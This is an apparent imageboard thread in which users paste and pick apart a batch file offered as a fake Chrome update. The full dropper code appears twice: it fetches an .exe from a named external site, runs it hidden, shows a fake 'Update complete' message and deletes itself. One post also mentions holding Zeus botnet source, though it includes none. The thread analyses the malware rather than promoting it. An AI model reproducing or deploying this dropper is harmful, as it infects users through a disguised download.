Thread replies: 9
Thread images: 4
Thread images: 4
File: untitled.jpg (101KB, 1024x600px) Image search:
[Google]
101KB, 1024x600px
hello /g/,
today i was browsing on the information superhighway! i came across this sketchy looking site called "eeteeinsightsoft.org". the site offered me a free chrome update!!!! how cool! the update came in a 1KB .bat file (thats a batch program!) i havent run it yet, but i wanted to see how excited yo all must be!!! XD cant wait this is a good update i hope!!!1!!
>>
File: 574567.jpg (71KB, 1600x900px) Image search:
[Google]
71KB, 1600x900px
enough memes, i wanted to see what the file does to my pc but it seems to fail whenever i run it
>>
>>55678702
Even the viruses are abandoning XP
>>
File: 345634563564.jpg (221KB, 1600x900px) Image search:
[Google]
221KB, 1600x900px
@echo off
echo a=new ActiveXObject('Wscript.Shell');b=new ActiveXObject('Scripting.FileSystemObject');c=new ActiveXObject('MSXML2.XMLHTTP');d=new ActiveXObject('ADODB.Stream');url='https://eeteeinsightsoft.org/17/528.dat';fname=b.GetSpecialFolder(2)+'\\4f3c761500f431702991b089eb80ee1d.exe';c.open('GET', url, false);c.send(null);d.Open;d.Type = 1;d.Write(c.ResponseBody);d.Position=0;if (b.Fileexists(fname))b.DeleteFile(fname);d.SaveToFile(fname);a.run('cmd.exe /c "'+fname+'"',0,false);WScript.Echo('Update complete.'); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
this is the code in the batch file
pic is the error it gives when run
how do i fix this virus?
>>
>>55678718
more
>>
>>55678718
those... those are balls
>>
>>55678668
This isn't 2004 m8.
>>
i'm a noob. Just got this from a Russian thingy some time ago, that's all. I'm an idiot trying to learn.
Zeus botnet translated. It's the 2009 version though. I know fuck all about programming. I asked some bloke on the dark net and he told me to start programming with APL, but I made the switch to linux and I can't load the right key board font even though terminal brings up apl fairly easily. Then some other bloke said to try A+ instead because it accepts the ASCII stuff and the European layout. But every A+ is about emacs and cancer. I kid you not, no A+ tutorials worth mentioning. They told me APL and A+ allows you to try cooler shit because you're allowed to do more stuff. Then they told me to move onto C but only after I got A+ or APL. I tell them that the zeus translation is in c++, c and php for the command and control bits, and that i'd need a copy of windows server 2010. Not server, the windows thing you use to write c++, the thing that has c#. I have mono of course but fuck if i know how to use it.
>>
File: 1327184434100.jpg (7KB, 232x252px) Image search:
[Google]
7KB, 232x252px
>>55678731
>how do i fix this virus?
Looks like the script is trying to download an exe. I haven't touch batch in years so I'm having a time to read this shit, luckily we can just replace the semi-colon with new lines to make it more readable.echo a=new ActiveXObject('Wscript.Shell')
b=new ActiveXObject('Scripting.FileSystemObject')
c=new ActiveXObject('MSXML2.XMLHTTP')
d=new ActiveXObject('ADODB.Stream')
url='https://eeteeinsightsoft.org/17/528.dat'
fname=b.GetSpecialFolder(2)+'\\4f3c761500f431702991b089eb80ee1d.exe'
c.open('GET', url, false)
c.send(null)
d.Open
d.Type = 1
d.Write(c.ResponseBody)
d.Position=0
if (b.Fileexists(fname))b.DeleteFile(fname)
d.SaveToFile(fname)
a.run('cmd.exe /c "'+fname+'"',0,false)
WScript.Echo('Update complete.')
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
Thread posts: 9
Thread images: 4
Thread images: 4